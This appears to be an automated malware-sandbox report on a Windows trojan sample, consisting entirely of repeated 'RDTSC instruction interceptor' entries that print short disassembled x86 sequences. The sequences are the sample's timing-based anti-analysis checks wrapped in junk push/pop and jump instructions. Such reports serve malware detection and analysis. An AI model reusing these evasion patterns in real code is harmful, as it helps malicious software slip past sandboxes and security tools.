Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B31A6E second address: B31AB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jg 00007FABC90CD756h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FABC90CD758h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov edi, dword ptr [ebp+1245AEBFh] 0x00000031 lea eax, dword ptr [ebp+1249552Eh] 0x00000037 mov cx, bx 0x0000003a push eax 0x0000003b push ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6046F second address: B60480 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jno 00007FABC9471C26h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B60BE8 second address: B60BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B60BEC second address: B60BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B60BF0 second address: B60C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FABC90CD75Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B65412 second address: B65430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FABC9471C37h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B65430 second address: B65434 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6948A second address: B69496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FABC9471C26h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6D6F1 second address: B6D6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6D6F7 second address: B6D6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6D6FD second address: B6D706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6D706 second address: B6D718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6D862 second address: B6D871 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007FABC90CD756h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6DB78 second address: B6DB7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6E0EA second address: B6E0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6E0F0 second address: B6E0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: B6E0F5 second address: B6E0FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C0B074 second address: C0B07A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C0B07A second address: C0B0A0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FABC9471C26h 0x00000008 jmp 00007FABC9471C36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C0B0A0 second address: C0B0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C12E12 second address: C12E1E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jl 00007FABC9471C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C12E1E second address: C12E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: C12E25 second address: C12E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0D9C second address: 4DD0DCA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, 3A0Ah 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FABC90CD761h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FABC90CD75Dh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0BC2 second address: 4DC0BF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FABC9471C37h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0BF0 second address: 4DC0BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0BF6 second address: 4DC0C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop edx 0x0000000d mov al, 58h 0x0000000f popad 0x00000010 mov edi, 0F967BF6h 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 jmp 00007FABC9471C33h 0x0000001d mov dl, al 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 movsx edx, ax 0x00000026 movzx eax, di 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FABC9471C30h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA00F7 second address: 4DA0194 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 1CFAEE61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov si, 0F9Dh 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 jmp 00007FABC90CD766h 0x00000015 mov eax, 19AB3141h 0x0000001a popad 0x0000001b push eax 0x0000001c jmp 00007FABC90CD767h 0x00000021 xchg eax, ebp 0x00000022 jmp 00007FABC90CD766h 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a mov ax, 1BCDh 0x0000002e pushfd 0x0000002f jmp 00007FABC90CD75Ah 0x00000034 add eax, 3A37D4E8h 0x0000003a jmp 00007FABC90CD75Bh 0x0000003f popfd 0x00000040 popad 0x00000041 push dword ptr [ebp+04h] 0x00000044 pushad 0x00000045 mov ebx, ecx 0x00000047 popad 0x00000048 push dword ptr [ebp+0Ch] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FABC90CD75Fh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0194 second address: 4DA0198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA0198 second address: 4DA019E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA019E second address: 4DA01AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C2Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA01F0 second address: 4DA01F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA01F4 second address: 4DA01FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DA01FA second address: 4DA020B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC09D5 second address: 4DC09E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC09E7 second address: 4DC0A17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FABC90CD766h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0A17 second address: 4DC0A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0A1B second address: 4DC0A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0A1F second address: 4DC0A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0453 second address: 4DC0459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0459 second address: 4DC045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC045E second address: 4DC0464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0464 second address: 4DC04F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov si, 4ACDh 0x00000011 mov edi, esi 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FABC9471C2Fh 0x0000001a xchg eax, ebp 0x0000001b jmp 00007FABC9471C36h 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FABC9471C2Eh 0x00000029 jmp 00007FABC9471C35h 0x0000002e popfd 0x0000002f push eax 0x00000030 push edx 0x00000031 pushfd 0x00000032 jmp 00007FABC9471C2Eh 0x00000037 adc si, 27D8h 0x0000003c jmp 00007FABC9471C2Bh 0x00000041 popfd 0x00000042 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0EEE second address: 4DC0EF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0EF4 second address: 4DC0EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0EF8 second address: 4DC0F11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0F11 second address: 4DC0F17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0F17 second address: 4DC0F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0F26 second address: 4DC0F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC0F2A second address: 4DC0F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FABC90CD764h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ebx, esi 0x00000012 call 00007FABC90CD75Ah 0x00000017 pop ebx 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007FABC90CD75Ch 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FABC90CD767h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE01CF second address: 4DE01EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE01EC second address: 4DE01F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE01F2 second address: 4DE01F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE01F6 second address: 4DE0233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FABC90CD764h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FABC90CD760h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bl, 02h 0x0000001d mov esi, 318F2F75h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0233 second address: 4DE0295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC9471C2Dh 0x00000009 adc eax, 37FC5886h 0x0000000f jmp 00007FABC9471C31h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push edx 0x0000001f pop ecx 0x00000020 pushfd 0x00000021 jmp 00007FABC9471C2Fh 0x00000026 xor ah, FFFFFFBEh 0x00000029 jmp 00007FABC9471C39h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0295 second address: 4DE029B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE029B second address: 4DE029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE029F second address: 4DE02A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE02A3 second address: 4DE02C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b pushad 0x0000000c push edi 0x0000000d push esi 0x0000000e pop edx 0x0000000f pop ecx 0x00000010 mov ax, dx 0x00000013 popad 0x00000014 and dword ptr [eax+04h], 00000000h 0x00000018 pushad 0x00000019 mov ebx, 62C337E8h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE02C3 second address: 4DE0302 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FABC90CD763h 0x00000008 or si, 972Eh 0x0000000d jmp 00007FABC90CD769h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0302 second address: 4DE0306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0306 second address: 4DE030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DC03DB second address: 4DC0423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 mov esi, 428D0F67h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov esi, 56A2845Fh 0x00000017 pushfd 0x00000018 jmp 00007FABC9471C34h 0x0000001d or ecx, 0246D8C8h 0x00000023 jmp 00007FABC9471C2Bh 0x00000028 popfd 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d mov cl, DFh 0x0000002f push eax 0x00000030 push edx 0x00000031 push edi 0x00000032 pop esi 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0D2E second address: 4DD0D4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FABC90CD765h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0D4E second address: 4DD0D54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DD0D54 second address: 4DD0D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE004A second address: 4DE0050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0050 second address: 4DE0054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0054 second address: 4DE0058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0058 second address: 4DE0095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FABC90CD766h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, si 0x00000015 jmp 00007FABC90CD766h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE0095 second address: 4DE009B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4DE009B second address: 4DE009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe RDTSC instruction interceptor: First address: 4E00688 second address: 4E006F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FABC9471C2Eh 0x00000011 add eax, 30F50238h 0x00000017 jmp 00007FABC9471C2Bh 0x0000001c popfd 0x0000001d push ecx 0x0000001e mov ch, bh 0x00000020 pop eax 0x00000021 popad 0x00000022 push eax 0x00000023 jmp 00007FABC9471C2Eh 0x00000028 xchg eax, ebp 0x00000029 pushad 0x0000002a mov edx, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e call 00007FABC9471C38h 0x00000033 pop ecx 0x00000034 rdtsc
